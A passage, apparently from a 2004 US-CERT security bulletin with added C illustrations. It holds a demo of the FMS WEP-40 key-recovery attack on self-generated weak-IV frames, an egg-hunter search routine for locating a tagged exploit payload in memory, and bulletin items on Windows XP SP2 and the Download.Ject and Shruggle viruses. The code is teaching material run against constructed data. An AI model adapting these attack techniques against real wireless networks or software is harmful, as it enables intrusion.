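static const uint8_t SECRET_KEY[KEY_LEN] = { 0x1f, 0x7a, 0xc3, 0x05, 0xe8 };

/* Builds a capture of one data frame per classic weak IV (B+3, 255, X), runs the
 * attack on it, fills out[] and returns 1 on success. */
int fms_recover_key(uint8_t out[KEY_LEN])
{
    static struct packet pk[KEY_LEN * 256];
    size_t n = 0;
    for (int B = 0; B < KEY_LEN; B++)
        for (int X = 0; X < 256; X++, n++) {
            uint8_t K[RC4_KEY_LEN] = { (uint8_t)(B + IV_LEN), 0xff, (uint8_t)X };
            memcpy(K + IV_LEN, SECRET_KEY, KEY_LEN);
            memcpy(pk[n].iv, K, IV_LEN);
            pk[n].ct0 = rc4_first_byte(K) ^ SNAP_DSAP;
        }
    memset(out, 0, KEY_LEN);
    return fms_search(pk, n, out, 0);
}

int main(void)
{
    uint8_t key[KEY_LEN];
    if (!fms_recover_key(key)) { puts("key not recovered"); return 1; }
    printf("recovered WEP-40 key:");
    for (int i = 0; i < KEY_LEN; i++) printf(" %02x", key[i]);
    printf(" (%s)\n", memcmp(key, SECRET_KEY, KEY_LEN) ? "wrong" : "matches");
    return 0;
}
```

Compile with cc -O2 and run. With 256 weak IVs per key byte the correct value usually has the most votes outright, and the search takes the first candidate at every level; the fudge factor and the verification against all packets are what turn a statistical guess into a confirmed key, and they are also why a real cracker needs far more captured traffic than this demo, since weak IVs are only a small fraction of what a live network produces.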
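The find_shell code entry in the table above describes an "egg hunter": a small first-stage shellcode that fits in the overflowed buffer, scans the process for a tag and jumps to the larger payload stored behind it. The following C program is an added illustration, not the bulletin's or the find_shell code package's own code. It shows the search step over a constructed memory region; the tag value, the region layout and the payload string are assumptions of the demo, the final jump is replaced by returning the payload's offset, and the kernel page-probe that a real hunter needs is described in the comments rather than performed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 4-byte tag stored twice in front of the payload ("w00tw00t").  Doubling it lets
 * the hunter hold one copy in a register without matching its own code. */
#define EGG_TAG 0x74303077u   /* "w00t" as a little-endian word (assumed for the demo) */

/* Search [start, start+len) for two consecutive copies of tag and return a pointer
 * to the bytes after them, or NULL.  A real hunter walks the whole address space one
 * byte at a time and, before touching each page, asks the kernel whether the page is
 * mapped (access(2) on Linux, NtAccessCheckAndAuditAlarm on Windows) so unmapped
 * pages are skipped instead of crashing the process.  Here the region is a buffer
 * we own, so no page probe is needed. */
static const uint8_t *find_egg(const uint8_t *start, size_t len, uint32_t tag)
{
    uint32_t w1, w2;
    for (size_t off = 0; off + 2 * sizeof tag <= len; off++) {
        memcpy(&w1, start + off, sizeof w1);              /* unaligned-safe read */
        if (w1 != tag) continue;
        memcpy(&w2, start + off + sizeof w1, sizeof w2);
        if (w2 == tag) return start + off + 2 * sizeof tag;   /* a real hunter does jmp edi here */
    }
    return NULL;
}

/* Constructed stand-in for the target's memory: filler, a lone copy of the tag (as the
 * hunter's own code contains) and the egg plus payload far from the small buffer. */
#define REGION_SIZE 65536
#define EGG_OFFSET  40000
static const char PAYLOAD[] = "bind-shell payload would start here";

/* Returns the offset of the payload inside the region, or -1 if it is not found. */
long egghunt_demo(void)
{
    static uint8_t region[REGION_SIZE];
    uint32_t tag = EGG_TAG;
    memset(region, 0x41, sizeof region);
    memcpy(region + 100, &tag, sizeof tag);               /* lone tag: must be skipped */
    memcpy(region + EGG_OFFSET, &tag, sizeof tag);        /* egg: tag, tag, payload */
    memcpy(region + EGG_OFFSET + 4, &tag, sizeof tag);
    memcpy(region + EGG_OFFSET + 8, PAYLOAD, sizeof PAYLOAD);
    const uint8_t *p = find_egg(region, sizeof region, EGG_TAG);
    return p ? (long)(p - region) : -1;
}

int main(void)
{
    long off = egghunt_demo();
    if (off < 0) { puts("egg not found"); return 1; }
    printf("egg found; payload starts at offset %ld\n", off);
    return 0;
}
```

The lone tag at offset 100 is the case that matters in practice: the hunter's own bytes contain the tag once, so a single-copy match would make it jump into itself, which is why the egg is the tag written twice.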
Trends
- US-CERT Cyber Security Alert SA04-243A: Security Improvements in Windows XP Service Pack 2. Windows XP Service Pack 2 is a major operating system update that contains a number of new security updates and features. Like other Microsoft Service Packs, Windows XP Service Pack 2 also includes previously released security fixes and other operating system updates. To help protect your Windows XP computer from attacks and vulnerabilities, install Service Pack 2 using Windows Update or Automatic Updates. Service Pack 2 makes significant changes to improve the security of Windows XP, and these changes may have negative effects on some programs and Windows functionality. Before you install Service Pack 2, back up your important data and consult your computer manufacturer's web site for information about Service Pack 2. Downloads are available at: http://www.microsoft.com/windowsxp/sp2/default.mspx. See the US-CERT alert at: http://www.uscert.gov/cas/alerts/SA04-243A.html
Viruses/Trojans
New Viruses / Trojans
Viruses or Trojans Considered to be a High Level of Threat
- Download.Ject: A new version of Download.Ject infects vulnerable systems with a Trojan horse and a keystroke logger. Unlike the original Download.Ject worm, the new worm generates pop-up advertisements for pornographic sites and changes the Web home page and the Internet Explorer search pane on infected systems. The attacks begin with instant messages, sent to people using America Online's AOL Instant Messenger or the ICQ instant messaging program, inviting recipients to click on a link to a Web page.
- W64.Shruggle.1318: While not a high-threat virus, W64.Shruggle.1318 is the first known virus to attack 64-bit Windows executables on AMD64 systems. It infects AMD64 Windows Portable Executable (PE) files.
The following table provides, in alphabetical order, a list of new viruses, variations of previously encountered viruses, and Trojans that have been discovered during the period covered by this bulletin. This information has been compiled from the following anti-virus vendors: Sophos, Trend Micro, Symantec, McAfee, Network Associates, Central Command, F-Secure, Kaspersky Labs, MessageLabs, Panda Software, Computer Associates, and The WildList Organization International. Users should keep anti-virus software up to date and should contact their anti-virus vendors to obtain specific information on the Trojans and Trojan variants that anti-virus software detects.
NOTE: At times, viruses and Trojans may contain names or content that may be considered offensive.